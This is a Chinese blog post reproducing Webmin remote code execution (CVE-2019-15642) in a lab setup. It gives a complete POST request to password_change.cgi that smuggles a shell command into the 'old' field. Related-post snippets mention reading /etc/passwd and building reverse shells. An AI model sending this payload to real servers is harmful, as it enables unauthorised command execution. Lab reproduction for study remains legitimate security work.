webmin 远程代码执行 (CVE-2019-15642)

已于 2024-04-03 09:47:30 修改
阅读量395 收藏
点赞数
文章标签: 网络 服务器 运维
于 2022-09-05 16:37:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/126708256
版权

1.漏洞描述

        Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。 账户密码:root/root

2.登录后抓包构造数据

注意:登录是是用https访问

当我们的用户名存在时会直接返回修改密码失败,原密码错误,不会执行后面的指令。当用户存在时不存在漏洞,但是当用户不存在时确可以执行命令。
在请求体测试参数中只要确保存在user、old、new1、new2这四个参数就可执行命令
 

POST /password_change.cgi HTTP/1.1
Host: ip:27124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://ip:27124/
Cookie: _ga=GA1.1.45614267.1662015780; redirect=1; testing=1; sid=ffbf88ffbd312ddb7c2c6f47abe42d2c
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

user=root11111&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2

64ec955afa23405db86506ca3ef9c004.png

 

 

weixin_42675091
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -d root@9460493fa985:/# passwd root Webmin>用户名= root,密码= root :high_voltage: root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d Creating network "cve-2019-15107_default" with the default driver Pullin
webmin 远程代码执行CVE-2019-15642
YouthBelief的博客
11-11 995
webmin 远程代码执行CVE-2019-15642webmin 远程代码执行CVE-2019-15642)0x01 漏洞描述0x02 影响范围0x03 漏洞复现反弹shell0x04 漏洞修复 webmin 远程代码执行CVE-2019-15642) 0x01 漏洞描述 Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。 账户密码:root/root
Vulfocus--->webmin 远程代码执行CVE-2019-15642
weixin_63124284的博客
10-02 541
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码
Webmin 远程代码执行CVE-2022-0824)漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3084
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
Webmin未经身份验证的远程代码执行
weixin_43828818的博客
05-04 394
[墨者学院]——Webmin未经身份验证的远程代码执行 做题前看看大佬写的漏洞原理:[https://blog.csdn.net/qq_43380549/article/details/100011292] 漏洞描述:Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webm...
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
webmin-1.690-1.noarch.rpm
05-17
webmin-1.690-1.noarch.rpm webmin-1.690-1.noarch.rpm
webmin-1.954-1.noarch.rpm
08-20
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、...
Webmin远程代码执行(CVE-2019-15642)
最新发布
m0_65150886的博客
02-21 265
Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。账户密码:root/root。3.通过burp随便抓取一个页面的包,并修改请求内容,执行id命令。1.访问https://ip:port,出现如下页面,开始实验。5.构造反弹shell命令,并对其进行url编码。Webmin是一套基于Web的用于类。2.输入账号密码,进行登录。
webmin类似windows的控制面板
01-29
类似windows的控制面板,安装后通过http://127.0.0.1:10000 来访问管理,有很多设置,非常方便!!
Webmin 远程代码执行Getshell漏洞复现 编号:CVE-2022-0824
╲ゞ紅桃K
08-31 2002
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。......
漏洞复现——Webmin 远程命令执行CVE-2019-15107)
lay77的博客
10-12 110
Webmin是一款基于Web远程管理工具,该工具存在一个远程命令执行漏洞(CVE-2019-15107)。攻击者可以通过特制的请求,未经身份验证的情况下执行任意命令,并可能导致服务器被完全控制。禁用或限制Webmin远程访问,仅允许访问来自受信任的IP地址。尽快更新Webmin版本至1.930或更高版本,以修复该漏洞。配置Web服务器强制使用HTTPS加密连接,并使用安全证书。使用防火墙规则,限制对Webmin的访问仅来自内部网络Webmin版本:1.920及之前的版本。此漏洞报告无附带文件。
【漏洞复现】Webmin 远程命令执行(CVE-2019-15107)
过期的秋刀鱼
11-05 446
1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。直接访问https://your-ip:10000/password_change.cgi。上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行的命令。
墨者学院—Webmin未经身份验证的远程代码执行(简单复习)
LRedAnt的博客
12-25 1430
墨者学院—Webmin未经身份验证的远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-1...
webmin 远程命令执行CVE-2019-15107)复现
YouthBelief的博客
11-11 1206
Webmin漏洞前言webmin 远程命令执行CVE-2019-15107)0x01 漏洞描述0x02 影响范围0x03 漏洞复现命令执行0x04 漏洞修复 前言 WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 webmin 远程命令执行CVE-2019-15107) 0x01 漏洞描述 Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无
webmin 远程命令执行CVE-2019-15107)漏洞复现
weixin_42675091的博客
09-06 359
webmin 远程命令执行CVE-2019-15107)漏洞复现
Webmin 远程命令执行漏洞
jammny
01-16 1467
前言: Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 影响版本: Webmin <= 1.920 漏洞代码: def peer "#{ss1 ? 'https:// : ' http://' }#{rhost}:#{rport}" end # Targe...
Webmin远程命令执行漏洞复现报告
weixin_56537388的博客
10-12 291
Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/直接利用payload即可。可以根据网站指纹信息。升级到1.930版本。
CVE-2022-36554
08-29
- *3* [CVE-2022-34265 &CVE-2019-14234 sql注入](https://blog.csdn.net/weixin_53090346/article/details/125760708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值